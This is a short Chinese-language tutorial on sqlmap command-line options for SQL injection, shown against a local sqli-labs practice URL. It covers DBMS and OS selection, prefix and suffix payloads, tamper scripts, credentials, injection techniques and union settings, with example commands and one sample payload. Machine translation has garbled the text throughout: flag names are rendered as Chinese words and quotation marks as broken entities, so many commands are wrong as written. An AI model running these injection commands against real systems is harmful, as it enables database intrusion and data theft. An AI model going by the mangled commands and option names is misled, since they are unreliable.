这篇文章将为大家详细讲解有关如何解析sqlmap注入参数,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
一、指定数据库类型——dbms
http://192.168.1.121/sqli/Less-1/?id=1&及名称=2 - dbms mysql - dbs
二,指定操作系统,os
http://192.168.1.121/sqli/Less-1/?id=1&及名称=2——操作系统windows dbs
三,解决编码问题
将所有结果转换为字符串,并用空格替换零结果——no-cast
四、关闭字符串转义机制
——无处可逃
五,设置无效值替换
——invalid-bignum大整数替换
——invalid-logical布尔操作替换
——invalid-string随机字符串替换
六、自定义注入负载位置
——prefix设置前缀
——后缀设置后缀
sqlmap - u“http://192.168.1.121/sqli/Less-1/?id=1"——prefix=? # 39;)“;——后缀=?和(& # 39;abc # 39;=& # 39; abc"——dbs
有效载荷:id=(& # 39; 1 & # 39;)和(& # 39;abc # 39;=& # 39; abc # 39;)
七,设置夯脚本
sqlmap - u“http://192.168.1.121/sqli/Less-1/?id=1"——干预“least.py varnish.py"——dbs
八,设置dbms认证
sqlmap - u“http://192.168.1.121/sqli/Less-1/?id=1"——dbms-cred=案?root"——dbs
九,设置具体sql注入技术
——技术B布尔盲注
——技术E报错注入U
——技术联盟查询注入
——技术年代堆叠注入
——技术T时间盲注
——技术问内联查询注入
sqlmap - U“http://192.168.1.121/sqli/Less-1/?id=1"——技术T time-sec 3——dbs
时间交会时间盲注时间为3
十,指定工会字段数
sqlmap - u“http://192.168.1.121/sqli/Less-1/?id=1"——union-cols 12 - 18 dbs
十一,指定工会字符,默认是空
sqlmap - u“http://192.168.1.121/sqli/Less-1/?id=1"——union-char aaa dbs
关于如何解析sqlmap注入参数就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看的到。
